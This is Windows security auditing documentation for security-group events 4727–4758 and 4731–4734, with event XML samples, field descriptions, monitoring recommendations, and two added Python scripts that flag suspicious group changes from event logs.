4727(S): A security-enabled global group was created. See event “4731: A security-enabled local group was created.” Event 4727 is the same, but it is generated for a global security group instead of a local security group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
Important: this event generates only for domain groups, so the Local sections in event 4731 do not apply.
4737(S): A security-enabled global group was changed. See event “4735: A security-enabled local group was changed.” Event 4737 is the same, but it is generated for a global security group instead of a local security group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
Important: this event generates only for domain groups, so the Local sections in event 4735 do not apply.
4728(S): A member was added to a security-enabled global group. See event “4732: A member was added to a security-enabled local group.” Event 4728 is the same, but it is generated for a global security group instead of a local security group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
Important: this event generates only for domain groups, so the Local sections in event 4732 do not apply.
4729(S): A member was removed from a security-enabled global group. See event “4733: A member was removed from a security-enabled local group.” Event 4729 is the same, but it is generated for a global security group instead of a local security group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
Important: this event generates only for domain groups, so the Local sections in event 4733 do not apply.
4730(S): A security-enabled global group was deleted. See event “4734: A security-enabled local group was deleted.” Event 4730 is the same, but it is generated for a global security group instead of a local security group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
Important: this event generates only for domain groups, so the Local sections in event 4734 do not apply.
4754(S): A security-enabled universal group was created. See event “4731: A security-enabled local group was created.” Event 4754 is the same, but it is generated for a universal security group instead of a local security group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
Important: this event generates only for domain groups, so the Local sections in event 4731 do not apply.
4755(S): A security-enabled universal group was changed. See event “4735: A security-enabled local group was changed.” Event 4737 is the same, but it is generated for a universal security group instead of a local security group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
Important: this event generates only for domain groups, so the Local sections in event 4735 do not apply.
4756(S): A member was added to a security-enabled universal group. See event “4732: A member was added to a security-enabled local group.” Event 4756 is the same, but it is generated for a universal security group instead of a local security group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
Important: this event generates only for domain groups, so the Local sections in event 4732 do not apply.
4757(S): A member was removed from a security-enabled universal group. See event “4733: A member was removed from a security-enabled local group.” Event 4757 is the same, but it is generated for a universal security group instead of a local security group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
Important: this event generates only for domain groups, so the Local sections in event 4733 do not apply.
4758(S): A security-enabled universal group was deleted. See event “4734: A security-enabled local group was deleted.” Event 4758 is the same, but it is generated for a universal security group instead of a local security group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
Important: this event generates only for domain groups, so the Local sections in event 4734 do not apply.
4731(S): A security-enabled local group was created.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Security Group Management
Event Description:
This event generates every time a new security-enabled (security) local group was created.
This event generates on domain controllers, member servers, and workstations.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4731</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13826</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-19T01:01:50.646049700Z" />
<EventRecordID>174849</EventRecordID>
<Correlation />
<Execution ProcessID="512" ThreadID="1092" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">AccountOperators</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6605</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3031e</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="SamAccountName">AccountOperators</Data>
<Data Name="SidHistory">-</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “create group” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “create group”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
New Group:
Security ID [Type = SID]: SID of created group. Event Viewer automatically tries to resolve SIDs and show the group name. If the SID cannot be resolved, you will see the source data in the event.
Group Name [Type = UnicodeString]: the name of the group that was created. For example: ServiceDesk
Group Domain [Type = UnicodeString]: domain or computer name of the created group. Formats vary,
and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For a local group, this field will contain the name of the computer to which this new group belongs,
for example: “Win81”.
Attributes:
SAM Account Name [Type = UnicodeString]: This is a name of new group used to support clients and
servers from previous versions of Windows (pre-Windows 2000 logon name). The value of
sAMAccountName attribute of new group object. For example: ServiceDesk. For local groups it is simply
a name of new group.
SID History [Type = UnicodeString]: contains previous SIDs used for the object if the object was moved
from another domain. Whenever an object is moved from one domain to another, a new SID is created and
becomes the objectSID. The previous SID is added to the sIDHistory property. This parameter contains
the value of sIDHistory attribute of new group object. This parameter might not be captured in the event,
and in that case appears as “-”. For local groups it is not applicable and always has “-“ value.
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See full list of user privileges in “Table 8. User Privileges.”.

Security Monitoring Recommendations
For 4731(S): A security-enabled local group was created.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you need to monitor each time a new security group is created, to see who created the group and when,
monitor this event.
If you need to monitor the creation of local security groups on different servers, and you use Windows
Event Forwarding to collect events in a central location, check “New Group\Group Domain.” It should
not be the name of the domain, but instead should be the computer name.
If your organization has naming conventions for account names, monitor “Attributes\SAM Account
Name” for names that don’t comply with the naming conventions.
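The following is an added example, not Microsoft's code, showing how the monitoring recommendations for 4782 (alert on every password-hash access), 4753 (deletion of a critical distribution group) and 4731 (Group Domain should be the computer name for a local group; SAM Account Name naming convention) can be applied to Security event XML in the layout shown in these articles. The critical-group list, the naming-convention pattern and the member server FS01 are assumptions; the sample events are constructed, modelled on the XML above.

```python
"""Detection checks for events 4782, 4753 and 4731 (added example, not from
the Microsoft documentation). CRITICAL_GROUPS, GROUP_NAME_RULE and host FS01
are assumptions; the sample events are constructed."""
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Assumed policy inputs (not from the docs): the organisation's list of
# critical distribution groups and a hypothetical group naming convention.
CRITICAL_GROUPS = {"ServiceDeskSecond", "FinanceDL"}
GROUP_NAME_RULE = re.compile(r"^(SG|DL)-[A-Za-z0-9]+$")


def make_event(event_id, computer, data):
    """Build a Security event in the documented XML layout (constructed sample)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (
        f'<Event xmlns="{NS["e"]}"><System>'
        '<Provider Name="Microsoft-Windows-Security-Auditing" />'
        f'<EventID>{event_id}</EventID><Channel>Security</Channel>'
        f'<Computer>{computer}</Computer></System>'
        f'<EventData>{fields}</EventData></Event>'
    )


def parse_event(xml_text):
    """Return (event_id, computer, {DataName: value}) from one event's XML."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    event_id = int(system.find("e:EventID", NS).text)
    computer = system.find("e:Computer", NS).text
    data = {d.get("Name"): (d.text or "")
            for d in root.find("e:EventData", NS).findall("e:Data", NS)}
    return event_id, computer, data


def evaluate(event_id, computer, data, domain_controllers=frozenset()):
    """Apply the documented recommendations; return a list of finding strings."""
    findings = []
    subject = f"{data.get('SubjectDomainName')}\\{data.get('SubjectUserName')}"
    target = f"{data.get('TargetDomainName')}\\{data.get('TargetUserName')}"
    host = computer.split(".")[0]
    if event_id == 4782:
        # Any access to an account's password hash should have been planned.
        findings.append(f"4782: password hash of {target} accessed by {subject} "
                        f"on {host}; confirm this migration was planned")
    elif event_id == 4753 and data.get("TargetUserName") in CRITICAL_GROUPS:
        # Group\Group Name matches the list of critical distribution groups.
        findings.append(f"4753: critical distribution group {target} deleted by "
                        f"{subject} on {host}")
    elif event_id == 4731:
        group_domain = data.get("TargetDomainName", "")
        # On a member server or workstation, New Group\Group Domain should be
        # the computer name, not the domain name. Domain controllers report
        # the domain for domain local groups, so they are exempt here.
        if host not in domain_controllers and group_domain.upper() != host.upper():
            findings.append(f"4731: local group {data.get('TargetUserName')} on "
                            f"{host} has Group Domain {group_domain}, expected {host}")
        sam = data.get("SamAccountName", "")
        if not GROUP_NAME_RULE.match(sam):
            findings.append(f"4731: SAM Account Name {sam} does not follow the "
                            f"naming convention (created by {subject})")
    return findings


# Constructed sample events modelled on the XML in the docs (DC01) plus a
# hypothetical member server FS01.
SAMPLE_EVENTS = [
    make_event(4782, "DC01.contoso.local", {
        "TargetUserName": "Andrei", "TargetDomainName": "CONTOSO",
        "SubjectUserSid": "S-1-5-18", "SubjectUserName": "DC01$",
        "SubjectDomainName": "CONTOSO"}),
    make_event(4753, "DC01.contoso.local", {
        "TargetUserName": "ServiceDeskSecond", "TargetDomainName": "CONTOSO",
        "SubjectUserName": "dadmin", "SubjectDomainName": "CONTOSO"}),
    make_event(4753, "DC01.contoso.local", {
        "TargetUserName": "Marketing", "TargetDomainName": "CONTOSO",
        "SubjectUserName": "dadmin", "SubjectDomainName": "CONTOSO"}),
    make_event(4731, "FS01.contoso.local", {
        "TargetUserName": "LocalAdmins", "TargetDomainName": "CONTOSO",
        "SubjectUserName": "dadmin", "SubjectDomainName": "CONTOSO",
        "SamAccountName": "LocalAdmins"}),
    make_event(4731, "FS01.contoso.local", {
        "TargetUserName": "SG-Backup", "TargetDomainName": "FS01",
        "SubjectUserName": "svcadmin", "SubjectDomainName": "FS01",
        "SamAccountName": "SG-Backup"}),
    make_event(4731, "DC01.contoso.local", {
        "TargetUserName": "SG-Helpdesk", "TargetDomainName": "CONTOSO",
        "SubjectUserName": "dadmin", "SubjectDomainName": "CONTOSO",
        "SamAccountName": "SG-Helpdesk"}),
]


def run_all(events=SAMPLE_EVENTS, domain_controllers=frozenset({"DC01"})):
    """Parse and evaluate every event; return all findings in order."""
    findings = []
    for xml_text in events:
        findings.extend(evaluate(*parse_event(xml_text), domain_controllers))
    return findings
```

Running `run_all()` over the constructed samples yields four findings: the 4782 event, the deletion of ServiceDeskSecond, and two for the LocalAdmins group on FS01 (domain-named Group Domain and a non-compliant name); the Marketing deletion and the convention-compliant groups produce none.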
4732(S): A member was added to a security-enabled local group.
4/5/2019 • 6 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Security Group Management
Event Description:
This event generates every time a new member was added to a security-enabled (security) local group.
This event generates on domain controllers, member servers, and workstations.
For every added member you will get a separate 4732 event.
You will typically see a “4735: A security-enabled local group was changed.” event without any changes in it prior to the 4732 event.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4732</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13826</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-19T03:02:38.563110400Z" />
    <EventRecordID>174856</EventRecordID>
    <Correlation />
    <Execution ProcessID="512" ThreadID="1092" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="MemberName">CN=eadmin,CN=Users,DC=contoso,DC=local</Data>
    <Data Name="MemberSid">S-1-5-21-3457937927-2839227994-823803824-500</Data>
    <Data Name="TargetUserName">AccountOperators</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6605</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3031e</Data>
    <Data Name="PrivilegeList">-</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “add member to the group” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “add member to the
group” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Member:
Security ID [Type = SID]: SID of the account that was added to the group. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: distinguished name of the account that was added to the group. For example: “CN=Auditor,CN=Users,DC=contoso,DC=local”. For local groups this field typically has the “-” value, even if the new member is a domain account. For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “-”.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Group:
Security ID [Type = SID]: SID of the group to which the new member was added. Event Viewer automatically tries to resolve SIDs and show the group name. If the SID cannot be resolved, you will see the source data in the event.
Group Name [Type = UnicodeString]: the name of the group to which new member was added. For
example: ServiceDesk
Group Domain [Type = UnicodeString]: domain or computer name of the group to which the new
member was added. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For a local group, this field will contain the name of the computer to which this group belongs, for example: “Win81”.
Built-in groups: Builtin
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”. See the full list of user privileges in “Table 8. User Privileges.”

Security Monitoring Recommendations

For 4732(S): A member was added to a security-enabled local group.

Type of monitoring required: Addition of members to local or domain security groups. You might need to monitor the addition of members to local or domain security groups.
Recommendation: If you need to monitor each time a member is added to a local or domain security group, to see who added the member and when, monitor this event. Typically, this event is used as an informational event, to be reviewed if needed.

Type of monitoring required: High-value local or domain security groups. You might have a list of critical local or domain security groups in the organization, and need to specifically monitor these groups for the addition of new members (or for other changes). Examples of critical local or domain groups are the built-in local Administrators group, Domain Admins, Enterprise Admins, and so on.
Recommendation: Monitor this event with the “Group\Group Name” values that correspond to the high-value local or domain security groups.

Type of monitoring required: High-value accounts. You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, the built-in local administrator account, domain administrators, service accounts, domain controller accounts, and so on.
Recommendation: Monitor this event with the “Subject\Security ID” and “Member\Security ID” that correspond to the high-value account or accounts.

Type of monitoring required: Anomalies or malicious actions. You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours.
Recommendation: When you monitor for anomalies or malicious actions, use the “Subject\Security ID” (with other information) to monitor how or when a particular account is being used.

Type of monitoring required: Non-active accounts. You might have non-active, disabled, or guest accounts, or other accounts that should never be used.
Recommendation: Monitor this event with the “Subject\Security ID” and “Member\Security ID” that correspond to the accounts that should never be used.

Type of monitoring required: Account whitelist. You might have a specific whitelist of accounts that are the only ones allowed to perform actions corresponding to particular events.
Recommendation: If this event corresponds to a “whitelist-only” action, review the “Subject\Security ID” for accounts that are outside the whitelist.

Type of monitoring required: Accounts of different types. You might want to ensure that certain actions are performed only by certain account types, for example, local or domain account, machine or user account, vendor or employee account, and so on.
Recommendation: If this event corresponds to an action you want to monitor for certain account types, review the “Subject\Security ID” to see whether the account type is as expected.

Type of monitoring required: External accounts. You might be monitoring accounts from another domain, or “external” accounts that are not allowed to perform certain actions (represented by certain specific events).
Recommendation: Monitor this event for the “Subject\Account Domain” corresponding to accounts from another domain or “external” accounts.

Type of monitoring required: Restricted-use computers or devices. You might have certain computers, machines, or devices on which certain people (accounts) should not typically perform any actions.
Recommendation: Monitor the target Computer: (or other target device) for actions performed by the “Subject\Security ID” that you are concerned about.

Type of monitoring required: Account naming conventions. Your organization might have specific naming conventions for account names.
Recommendation: Monitor “Subject\Account Name” for names that don’t comply with naming conventions.

Type of monitoring required: Mismatch between type of account (user or computer) and the group it was added to. You might want to monitor to ensure that a computer account was not added to a group intended for users, or a user account was not added to a group intended for computers.
Recommendation: Monitor the type of account added to the group to see if it matches what the group is intended for.
4733(S): A member was removed from a security-enabled local group.
4/5/2019 • 6 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Security Group Management
Event Description:
This event generates every time a member is removed from a security-enabled (security) local group.
This event generates on domain controllers, member servers, and workstations.
For every removed member you get a separate 4733 event.
You will typically see a “4735: A security-enabled local group was changed.” event without any changes in it immediately prior to the 4733 event.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4733</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13826</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-19T16:51:00.376806500Z" />
    <EventRecordID>175037</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="1524" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="MemberName">CN=Auditor,CN=Users,DC=contoso,DC=local</Data>
    <Data Name="MemberSid">S-1-5-21-3457937927-2839227994-823803824-2104</Data>
    <Data Name="TargetUserName">AccountOperators</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6605</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x35e38</Data>
    <Data Name="PrivilegeList">-</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “remove member from the group” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “remove member
from the group” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Member:
Security ID [Type = SID]: SID of the account that was removed from the group. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: distinguished name of the account that was removed from the group. For example: “CN=Auditor,CN=Users,DC=contoso,DC=local”. For local groups this field typically has the “-” value, even if the removed member is a domain account. For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “-”.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Group:
Security ID [Type = SID]: SID of the group from which the member was removed. Event Viewer automatically tries to resolve SIDs and show the group name. If the SID cannot be resolved, you will see the source data in the event.
Group Name [Type = UnicodeString]: the name of the group from which the member was removed. For
example: ServiceDesk
Group Domain [Type = UnicodeString]: domain or computer name of the group from which the member
was removed. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For a local group, this field will contain the name of the computer to which this group belongs, for example: “Win81”.
Built-in groups: Builtin
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”. See the full list of user privileges in “Table 8. User Privileges.”

Security Monitoring Recommendations

For 4733(S): A member was removed from a security-enabled local group.

Type of monitoring required: Removal of members from local or domain security groups. You might need to monitor the removal of members from local or domain security groups.
Recommendation: If you need to monitor each time a member is removed from a local or domain security group, to see who removed the member and when, monitor this event. Typically, this event is used as an informational event, to be reviewed if needed.

Type of monitoring required: High-value local or domain security groups. You might have a list of critical local or domain security groups in the organization, and need to specifically monitor these groups for the removal of members (or for other changes). Examples of critical local or domain groups are the built-in local Administrators group, Domain Admins, Enterprise Admins, and so on.
Recommendation: Monitor this event with the “Group\Group Name” values that correspond to the high-value local or domain security groups.

Type of monitoring required: Local or domain security groups with required members. You might need to ensure that for certain local or domain security groups, particular members are never removed.
Recommendation: Monitor this event with the “Group\Group Name” that corresponds to the group of interest, and the “Member\Security ID” of the members who should not be removed.

Type of monitoring required: High-value accounts. You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, the built-in local administrator account, domain administrators, service accounts, domain controller accounts, and so on.
Recommendation: Monitor this event with the “Subject\Security ID” and “Member\Security ID” that correspond to the high-value account or accounts.

Type of monitoring required: Anomalies or malicious actions. You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours.
Recommendation: When you monitor for anomalies or malicious actions, use the “Subject\Security ID” (with other information) to monitor how or when a particular account is being used.

Type of monitoring required: Non-active accounts. You might have non-active, disabled, or guest accounts, or other accounts that should never be used.
Recommendation: Monitor this event with the “Subject\Security ID” and “Member\Security ID” that correspond to the accounts that should never be used.

Type of monitoring required: Account whitelist. You might have a specific whitelist of accounts that are the only ones allowed to perform actions corresponding to particular events.
Recommendation: If this event corresponds to a “whitelist-only” action, review the “Subject\Security ID” for accounts that are outside the whitelist.

Type of monitoring required: Accounts of different types. You might want to ensure that certain actions are performed only by certain account types, for example, local or domain account, machine or user account, vendor or employee account, and so on.
Recommendation: If this event corresponds to an action you want to monitor for certain account types, review the “Subject\Security ID” to see whether the account type is as expected.

Type of monitoring required: External accounts. You might be monitoring accounts from another domain, or “external” accounts that are not allowed to perform certain actions (represented by certain specific events).
Recommendation: Monitor this event for the “Subject\Account Domain” corresponding to accounts from another domain or “external” accounts.

Type of monitoring required: Restricted-use computers or devices. You might have certain computers, machines, or devices on which certain people (accounts) should not typically perform any actions.
Recommendation: Monitor the target Computer: (or other target device) for actions performed by the “Subject\Security ID” that you are concerned about.

Type of monitoring required: Account naming conventions. Your organization might have specific naming conventions for account names.
Recommendation: Monitor “Subject\Account Name” for names that don’t comply with naming conventions.
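Applying the 4732 and 4733 recommendations above in code, as an added example that is not part of the Microsoft documentation: it parses the Event XML layout shown for both events and flags changes to critical groups, subjects that should never act, required members being removed, and user/computer type mismatches. The policy sets, the account-type table and the RID 1105 and RID 501 SIDs are constructed for the example; in production they would come from configuration and a directory lookup.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
DOMAIN_SID = "S-1-5-21-3457937927-2839227994-823803824"   # domain SID used in the page's samples

# Constructed monitoring policy; a real deployment would load this from configuration.
CRITICAL_GROUPS = {"AccountOperators", "Administrators", "Domain Admins", "Enterprise Admins"}
USER_ONLY_GROUPS = {"AccountOperators"}             # groups that should hold user accounts only
COMPUTER_ONLY_GROUPS = {"ClusterHosts"}             # constructed group name
NEVER_USED_SUBJECTS = {f"{DOMAIN_SID}-501"}         # constructed: the domain Guest account (RID 501)
REQUIRED_MEMBERS = {                                # group SID -> member SIDs that must never be removed
    f"{DOMAIN_SID}-6605": {f"{DOMAIN_SID}-2104"},   # keep the Auditor account in AccountOperators
}
ACCOUNT_TYPES = {                                   # member SID -> object class (normally an LDAP lookup)
    f"{DOMAIN_SID}-500": "user",
    f"{DOMAIN_SID}-2104": "user",
    f"{DOMAIN_SID}-1105": "computer",               # constructed computer account
}


def parse_event(xml_text):
    """Return (event_id, data) where data maps each EventData/Data Name to its text."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    return event_id, data


def evaluate(xml_text):
    """Apply the 4732/4733 monitoring recommendations to one event and return the findings."""
    event_id, d = parse_event(xml_text)
    if event_id not in (4732, 4733):
        return []
    action = "added to" if event_id == 4732 else "removed from"
    # Match on SIDs, not names: MemberName is "-" for local groups, resolved names can be
    # stale or renamed, and a SID is never reused for another principal.
    group, group_sid = d["TargetUserName"], d["TargetSid"]
    member_sid, subject_sid = d["MemberSid"], d["SubjectUserSid"]
    findings = []
    if group in CRITICAL_GROUPS:
        findings.append(f"critical-group: {member_sid} {action} {group} by {d['SubjectUserName']}")
    if subject_sid in NEVER_USED_SUBJECTS:
        findings.append(f"never-used-subject: {subject_sid} changed membership of {group}")
    if event_id == 4733 and member_sid in REQUIRED_MEMBERS.get(group_sid, set()):
        findings.append(f"required-member-removed: {member_sid} from {group}")
    kind = ACCOUNT_TYPES.get(member_sid, "unknown")
    if event_id == 4732 and kind == "computer" and group in USER_ONLY_GROUPS:
        findings.append(f"type-mismatch: computer account {member_sid} added to user group {group}")
    if event_id == 4732 and kind == "user" and group in COMPUTER_ONLY_GROUPS:
        findings.append(f"type-mismatch: user account {member_sid} added to computer group {group}")
    return findings


def sample_event(event_id, member_name, member_sid, subject_sid=f"{DOMAIN_SID}-1104",
                 subject_name="dadmin", group="AccountOperators", group_sid=f"{DOMAIN_SID}-6605"):
    """Build a constructed event in the Event XML layout shown on the page, for offline testing."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{{54849625-5478-4994-A5BA-3E3B0328C30D}}" />
    <EventID>{event_id}</EventID>
    <Task>13826</Task>
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
  </System>
  <EventData>
    <Data Name="MemberName">{member_name}</Data>
    <Data Name="MemberSid">{member_sid}</Data>
    <Data Name="TargetUserName">{group}</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">{group_sid}</Data>
    <Data Name="SubjectUserSid">{subject_sid}</Data>
    <Data Name="SubjectUserName">{subject_name}</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3031e</Data>
    <Data Name="PrivilegeList">-</Data>
  </EventData>
</Event>"""


# The two events shown on the page: eadmin (RID 500) added, then Auditor (RID 2104) removed, both by dadmin.
EVENT_4732 = sample_event(4732, "CN=eadmin,CN=Users,DC=contoso,DC=local", f"{DOMAIN_SID}-500")
EVENT_4733 = sample_event(4733, "CN=Auditor,CN=Users,DC=contoso,DC=local", f"{DOMAIN_SID}-2104")

if __name__ == "__main__":
    for event in (EVENT_4732, EVENT_4733):
        for finding in evaluate(event):
            print(finding)
```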
4734(S): A security-enabled local group was deleted.
4/5/2019 • 3 minutes to read

Applies to
